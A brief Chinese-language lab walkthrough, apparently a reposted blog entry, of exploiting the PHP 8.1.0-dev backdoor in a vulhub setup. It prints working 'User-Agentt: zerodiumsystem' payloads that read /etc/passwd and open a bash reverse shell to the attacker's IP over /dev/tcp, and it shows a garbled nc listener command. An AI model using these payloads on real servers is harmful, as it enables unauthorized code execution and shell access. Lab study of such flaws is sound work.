漏洞介紹
-
關于漏洞:PHP 8.1.0-dev 后門遠程命令執行漏洞
PHP verion 8.1.0-dev的PHP在服務器上運行,則攻擊者可以通過發送User-Agentt標頭執行任意代碼,
影響版本:PHP 8.1.0-dev
-
配置環境:
靶機:centos8
攻擊機:kali
其他:vulhub -->php–>8.1-backdoor
-
漏洞攻擊思路:
掃描埠,確定開啟的服務,漏洞尋找,漏洞利用
資訊收集
-
nmap掃描埠
-
訪問http://192.168.0.118:8080
訪問8080時顯示如下hello world界面
查看原始碼,檢查元素沒有發現有用資訊,用burp抓包試試 -
burp抓包
burp抓包,發送至Repeater,Go一下,回傳包中有 X-Powered-By: PHP/8.1.0-dev,得到了php版本號
-
查找漏洞
百度一下 PHP/8.1.0漏洞,找到PHP-8.1.0-dev 后門命令執行漏洞
漏洞利用
-
POC驗證
User-Agentt: zerodiumvar_dump(2*3); //或者User-Agentt: zerodiumsystem(“cat /etc/passwd”);
-
監聽
nc -lvp 192.168.0.118:8080
-
反彈shell
User-Agentt: zerodiumsystem(“bash -c ‘exec bash -i >& /dev/tcp/192.168.0.116/6666 0>&1’”);
反彈成功
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/290800.html
標籤:其他
上一篇:記錄第一次網路安全實訓(體驗課)